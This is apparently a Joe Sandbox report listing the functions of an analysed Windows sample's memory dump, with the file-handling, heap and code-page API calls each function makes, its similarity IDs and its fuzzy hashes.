Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 40f8996f98a39847f2251b68f6bcb48c960ee8892b24d1023d5e2606fdf3c27d
Instruction ID: 0294a41c8b107a15a42aa94b00e5805007f835d401d94911b4e65b04a90f009a
Opcode Fuzzy Hash: 40f8996f98a39847f2251b68f6bcb48c960ee8892b24d1023d5e2606fdf3c27d
Instruction Fuzzy Hash: 5101F73A61133AABCB21CFA8BC44B977BA8EF657A27114624F906D75D0D731D802C6E1

Function 009E9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,009ED343,00000001,?,?,?,00000000,009F551D,?,?,?), ref: 009E9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,009F551D,?,?,?,?,?,009F4FC7,?), ref: 009E9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,009ED343,00000001,?,?), ref: 009EA011

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: d22053107dcfb68bcfdd4c5a094f76b8fc139092a533fbb14f19c5bcadc44ffe
Instruction ID: 252932729f784b9ad22cb931e51dd17c7d6b75380677057ed4adef23a929bc71
Opcode Fuzzy Hash: d22053107dcfb68bcfdd4c5a094f76b8fc139092a533fbb14f19c5bcadc44ffe
Instruction Fuzzy Hash: 0431D231208385AFDF16CF25D808BAE77A9FF95711F04491DF9819B2A0C775AD48CBA2

Function 009EA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 009EC27E: _wcslen.LIBCMT ref: 009EC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA30C
GetLastError.KERNEL32(?,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA329

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: d63231381d5414b4239cb645e53d2b3c9395df084375c756ca4767eb283a9eef
Instruction ID: 0f2179018c278b727fe711daa78c2721931b754eb65ea19641fb59269766b23e
Opcode Fuzzy Hash: d63231381d5414b4239cb645e53d2b3c9395df084375c756ca4767eb283a9eef
Instruction Fuzzy Hash: 6001B531200294AAEF23ABB74C09BFD328C9F0D780F048414FA41E61B1D754EE8186B2

Function 00A0B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A0B8B8

Strings

, xrefs: 00A0B8FD

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 20db14c9a4742fdbd1057f22f9e31a953a6516fdc9ab58e630574a7643926376
Instruction ID: 4a952b8af3fe6e68255d36aee3b7ab060fa371f00111d65807476b29d870adba
Opcode Fuzzy Hash: 20db14c9a4742fdbd1057f22f9e31a953a6516fdc9ab58e630574a7643926376
Instruction Fuzzy Hash: A041277050438C9FDF218F689E84BFABBB9EB55344F1404ECE69A86182D335AA45CF70

Function 00A0AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00A0AFDD

Strings

LCMapStringEx, xrefs: 00A0AF7D, 00A0AF87

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: cbe7dba85fe9e6d8739306731e4c400f6c023cebc93752ef7b6fa35e58457568
Instruction ID: 5ed314bb1a1cb951e7769727bf00e7efcc45e110133cacd1a248cb56de22ccb8
Opcode Fuzzy Hash: cbe7dba85fe9e6d8739306731e4c400f6c023cebc93752ef7b6fa35e58457568
Instruction Fuzzy Hash: BD01E53250420EBBCF02AF90ED06DEE7F66FF58750F058554FE14661A0CA728A71AB91

Function 00A0AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A0A56F), ref: 00A0AF55

Strings

InitializeCriticalSectionEx, xrefs: 00A0AF1B, 00A0AF25

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 0cdf58cf093b682c3537a9b6aed1badc58055253522cad73f8c53cde75369ef4
Instruction ID: b4a5583f420038e6fa62ddb25439c73e1e8b00f148299fb63113e83a9ab29594
Opcode Fuzzy Hash: 0cdf58cf093b682c3537a9b6aed1badc58055253522cad73f8c53cde75369ef4
Instruction Fuzzy Hash: 48F0E93168520CBFCF019F90DC06DED7F71EF54711B048564FD085A2A0DA714E119785

Function 00A0ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00A0ADEE

Strings

FlsAlloc, xrefs: 00A0ADC0, 00A0ADCA

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 2fe315177cf3338b24fe3deef84295961e0fa143142dcaa4444578f49bad838c
Instruction ID: 06357b96adae51622dbbeb75200b9ec2d5941896e45020b74cd5c10042b00036
Opcode Fuzzy Hash: 2fe315177cf3338b24fe3deef84295961e0fa143142dcaa4444578f49bad838c
Instruction Fuzzy Hash: 92E0553168032C7BCA00EBA4EC06AEEBB64EB64721B0141A8FC0597280CD704E4182CA

Function 00A0BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00A0B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A0BA44,?), ref: 00A0B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A0BA89,?,00000000), ref: 00A0BC64
GetCPInfo.KERNEL32(00000000,00A0BA89,?,?,?,00A0BA89,?,00000000), ref: 00A0BC77

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4053b7eb549ba72cc7bb4f3db097cd26c3d5c4b9cc6b7a5093cbf2eca170d744
Instruction ID: a90d81c26d9b837c1d6c0e50ecbd7a294ceb84b5ce262d59368cdb160ff2c153
Opcode Fuzzy Hash: 4053b7eb549ba72cc7bb4f3db097cd26c3d5c4b9cc6b7a5093cbf2eca170d744
Instruction Fuzzy Hash: C3513570A2024D9FEB20CF71EA816BAFBF5EF45300F18446ED4968B2E1D73599458BA0

Function 009E9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,009E9A50,?,?,00000000,?,?,009E8CBC,?), ref: 009E9BAB
GetLastError.KERNEL32(?,00000000,009E8411,-00009570,00000000,000007F3), ref: 009E9BB6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bc6f54d1c79db0b5df19718d2700880a5b8cc97ccd66ebc4ee21016646661b8f
Instruction ID: 7188dd72fa5a363c98599201a8d267fbd623963a9c4cbb9c99b2b357c3d88093
Opcode Fuzzy Hash: bc6f54d1c79db0b5df19718d2700880a5b8cc97ccd66ebc4ee21016646661b8f
Instruction Fuzzy Hash: 9241F471604381CFDB26DF1BE5845AAB7EAFFD4310F188A2DE89183260D7B0ED458B51

Function 00A0BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00A097E5: GetLastError.KERNEL32(?,00A21030,00A04674,00A21030,?,?,00A03F73,00000050,?,00A21030,00000200), ref: 00A097E9
Part of subcall function 00A097E5: _free.LIBCMT ref: 00A0981C
Part of subcall function 00A097E5: SetLastError.KERNEL32(00000000,?,00A21030,00000200), ref: 00A0985D
Part of subcall function 00A097E5: _abort.LIBCMT ref: 00A09863

Part of subcall function 00A0BB4E: _abort.LIBCMT ref: 00A0BB80
Part of subcall function 00A0BB4E: _free.LIBCMT ref: 00A0BBB4

Part of subcall function 00A0B7BB: GetOEMCP.KERNEL32(00000000,?,?,00A0BA44,?), ref: 00A0B7E6

_free.LIBCMT ref: 00A0BA9F
_free.LIBCMT ref: 00A0BAD5

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: dc2216511595777c1341e02692f32b77d2086acb81a4a9c662f447904787ce62
Instruction ID: a1f0b293fcd1ebcafe74c5f3db34f07b6a515a33a4f3d8083cc7eb44285e5d6d
Opcode Fuzzy Hash: dc2216511595777c1341e02692f32b77d2086acb81a4a9c662f447904787ce62
Instruction Fuzzy Hash: 90310B31A1420DAFDB10EFA8F641B9DB7F5EF41360F214099E8049B2E2EB369D41DB60

Function 009E1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E1E55

Part of subcall function 009E3BBA: __EH_prolog.LIBCMT ref: 009E3BBF

_wcslen.LIBCMT ref: 009E1EFD

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 46db23f06a3ec204a383cf18132e81ca64cf9ca746a98d3dc6b2b2c1fe7be4c7
Instruction ID: 1d8185244844087df68937400c4ba1e6ee7150482585959a95c2dc3cabd0f72a
Opcode Fuzzy Hash: 46db23f06a3ec204a383cf18132e81ca64cf9ca746a98d3dc6b2b2c1fe7be4c7
Instruction Fuzzy Hash: A0312971904249AFCF16DF9AD945AEEBBFABF48300F10446EF885A7251CB365E50CB60

Function 009E9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009E73BC,?,?,?,00000000), ref: 009E9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 009E9E70

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 14562248f7e370f19140c7f6e963c7db93d447545c6f8f55843d0373b74b1909
Instruction ID: 234cc7068615da19f366e73171a82f2f64de79444709bcdf88b6746b4dab6bf1
Opcode Fuzzy Hash: 14562248f7e370f19140c7f6e963c7db93d447545c6f8f55843d0373b74b1909
Instruction Fuzzy Hash: 1721F032248295EFC716CF76C891BABBBE8AF95304F08491DF4C583181D328ED4D8BA1

Function 009E966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,009E9F27,?,?,009E771A), ref: 009E96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,009E9F27,?,?,009E771A), ref: 009E9716

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e9fd31263ae95b17e0888287b5c442490bebf6709c45f7f58670b24e156f5625
Instruction ID: 6a436ca9ed1638b4ea505485192e54e2d1386bde52f3e1ce0f059f1a447d264c
Opcode Fuzzy Hash: e9fd31263ae95b17e0888287b5c442490bebf6709c45f7f58670b24e156f5625
Instruction Fuzzy Hash: 8921C171100384AFE3319A66CC89BF777DCEB49724F004A19FAD5C21D1C778AC848631

Function 009E9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 009E9EC7
GetLastError.KERNEL32 ref: 009E9ED4

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 590f23c27de2fd410d3aa64498bad51fc28e4e1829c57bf5216865e7f5f75f7c
Instruction ID: 3520626b153e63a9639a9fa2f572c41ee2d2a67a9095a463edb804636db092aa
Opcode Fuzzy Hash: 590f23c27de2fd410d3aa64498bad51fc28e4e1829c57bf5216865e7f5f75f7c
Instruction Fuzzy Hash: 9011E531600740EBD736C62ACC40BA6B7ECAB45360F504A2DE253D26D0E7B4ED45C760

Function 00A08E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A08E75

Part of subcall function 00A08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A0CA2C,00000000,?,00A06CBE,?,00000008,?,00A091E0,?,?,?), ref: 00A08E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00A21098,009E17CE,?,?,00000007,?,?,?,009E13D6,?,00000000), ref: 00A08EB1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 6fb5e4ed6ec1afae812ce96c16fe1e0e59b65d9a366047d40c5e70df2854e400
Instruction ID: db804304ba8448f3d44bd4b311d501dbc5d473b179286db56b37a654e8a96219
Opcode Fuzzy Hash: 6fb5e4ed6ec1afae812ce96c16fe1e0e59b65d9a366047d40c5e70df2854e400
Instruction Fuzzy Hash: 72F0F63260110EA6DB216B65FD04BAF37688FD1BB0F244125F9D8A61D1DF7CDD0081A8

Function 009F109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 009F10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 009F10B2

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 25dde020a0b12ce85d8079346bfe29a0c67305bf77d59a17631584490534c248
Instruction ID: 48d57ab5c61666ac6eceec7c88108832c23d5c1233274ad35b0b3b77e2024af5
Opcode Fuzzy Hash: 25dde020a0b12ce85d8079346bfe29a0c67305bf77d59a17631584490534c248
Instruction Fuzzy Hash: D8E01A77B10249E7CF1DCBA49C059FB76EDEA482447288179E613E7101FD74EE824BA0

Function 009EA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009EA325,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA501

Part of subcall function 009EBB03: _wcslen.LIBCMT ref: 009EBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009EA325,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA532

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 30e689927f8eed5f10ab7097332b71116534ec83b02998a66fa0aa79527fa625
Instruction ID: 3d32d437fe9744e5578a34ba8991e48b83a944c7146e525b2f7778f07ee27f46
Opcode Fuzzy Hash: 30e689927f8eed5f10ab7097332b71116534ec83b02998a66fa0aa79527fa625
Instruction Fuzzy Hash: DAF0A932200249BBDF029FA1DC01FEE3BACAF08385F488060B948D6160DB31DE99EB10

Function 009EA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,009E977F,?,?,009E95CF,?,?,?,?,?,00A12641,000000FF), ref: 009EA1F1

Part of subcall function 009EBB03: _wcslen.LIBCMT ref: 009EBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,009E977F,?,?,009E95CF,?,?,?,?,?,00A12641), ref: 009EA21F

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
